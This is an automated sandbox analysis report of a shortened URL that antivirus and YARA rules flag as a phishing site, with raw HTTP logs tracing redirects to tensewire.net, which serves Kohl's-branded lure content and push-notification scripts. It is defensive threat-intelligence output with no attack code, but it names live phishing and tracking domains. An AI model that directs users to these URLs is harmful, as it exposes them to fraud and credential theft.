Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://clc.li/bsLRU

Overview

General Information

Sample URL:https://clc.li/bsLRU
Analysis ID:1431813
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected HtmlPhish10
Yara detected Phisher

Classification

  • System is w10x64
  • chrome.exe (PID: 1900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2216,i,6873913864203263267,792881258309955960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clc.li/bsLRU" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_70JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_88JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://clc.li/bsLRUSlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
      Source: https://unisonroad.comAvira URL Cloud: Label: phishing
      Source: https://tensewire.net/Virustotal: Detection: 5%Perma Link
      Source: https://unisonroad.comVirustotal: Detection: 9%Perma Link

      Phishing

      barindex
      Source: Yara matchFile source: dropped/chromecache_88, type: DROPPED
      Source: Yara matchFile source: dropped/chromecache_70, type: DROPPED
      Source: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343HTTP Parser: No favicon
      Source: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343HTTP Parser: No favicon
      Source: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343HTTP Parser: No favicon
      Source: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343HTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 184.24.36.112:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.24.36.112:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownTCP traffic detected without corresponding DNS query: 184.24.36.112
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /bsLRU HTTP/1.1Host: clc.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim HTTP/1.1Host: marginmasks.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://marginmasks.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /3a36ef2959e87b2ca27c8f04b726a343?_ax=w HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/vendors/fontawesome_pro/css/all.min.css HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/css/dublin/dist/common-hybrid.css?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /inc/msg.v3.js?662a9f54742ee HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /3a36ef2959e87b2ca27c8f04b726a343?_ax=w HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /uploads/archive/product/697/images/messmaster.png HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /uploads/archive/company/55/images/kohls-logo-purple.png HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/images/flags/flag-us.png HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff2 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tensewire.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tensewire.net/assets/vendors/fontawesome_pro/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/vendors/jquery-3.4.1.min.js HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap-4.5.3/js/bootstrap.min.js HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/js/functions.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/js/gbvar.js?v=60 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/js/intl_functions.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /uploads/archive/product/697/images/messmaster.png HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /uploads/archive/company/55/images/kohls-logo-purple.png HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/images/flags/flag-us.png HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/js/dublin/dist/common-hybrid.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /scripts/push/v9e118mez8 HTTP/1.1Host: trk-adulvion.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /assets/images/ci21.jpg HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/images/ci1.jpg HTTP/1.1Host: tensewire.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /service-worker.js HTTP/1.1Host: tensewire.netConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/images/ci1.jpg HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /assets/images/ci21.jpg HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET /3a36ef2959e87b2ca27c8f04b726a343 HTTP/1.1Host: tensewire.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: global trafficHTTP traffic detected: GET //scripts/pg/v9e118mez8 HTTP/1.1Host: trk-amropode.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
